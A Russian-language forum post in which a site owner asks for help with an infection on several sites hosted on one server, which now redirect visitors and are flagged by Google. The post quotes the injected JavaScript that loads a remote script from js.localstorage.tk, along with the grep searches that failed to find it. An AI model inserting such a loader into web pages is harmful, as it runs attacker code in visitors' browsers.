За последние несколько дней мои сайты подверглись вредоносной атаке. Когда я открываю сайт http://site1.com, он сначала перенаправляется на другую страницу (возможно, на рекламную страницу).
В браузере Chrome, когда я пытаюсь диагностировать проблему через консоль (F12), я обнаружил, что она показывает странную ошибку. «Не удалось загрузить ресурс: net :: ERR_NAME_NOT_RESOLVED», а URL-адрес - - https://js.localstorage.tk/s.js?crt=new.. В ходе дальнейшего исследования я обнаружил, что он вставляет следующий скрипт при каждой загрузке страницы каждого веб-сайта на этом конкретном сервере. (Не один сайт, а 3-4 сайта были заражены одной и той же атакой на одном сервере).
var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);
Я также пытался найти этот фрагмент кода в размещенных файловых системах зараженных веб-сайтов, используя различные команды "grep", как показано ниже, но ничего не смог найти.
grep -rwn /var/www/ -e 'js.localstorage.tk'
grep -rwn /var/www/ -e 'var z'
grep -rwn /var/www/ -e 'z.type'
grep -rwn /var/www/ -e 'z.src'
grep -rwn /var/www/ -e 'crt=new'
Но нет подсказки о введенном вредоносном скрипте. Тот же результат в исследовании БД.
Когда я захожу на сайт через локальную сеть без интернета, возникает та же ошибка со странным URL:
GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1
И хуже всего то, что теперь Google включил мои сайты в список «Опасный» и отображает предупреждение «Впереди обманчивый сайт» с темно-красным фоном.
Любая помощь ... !!!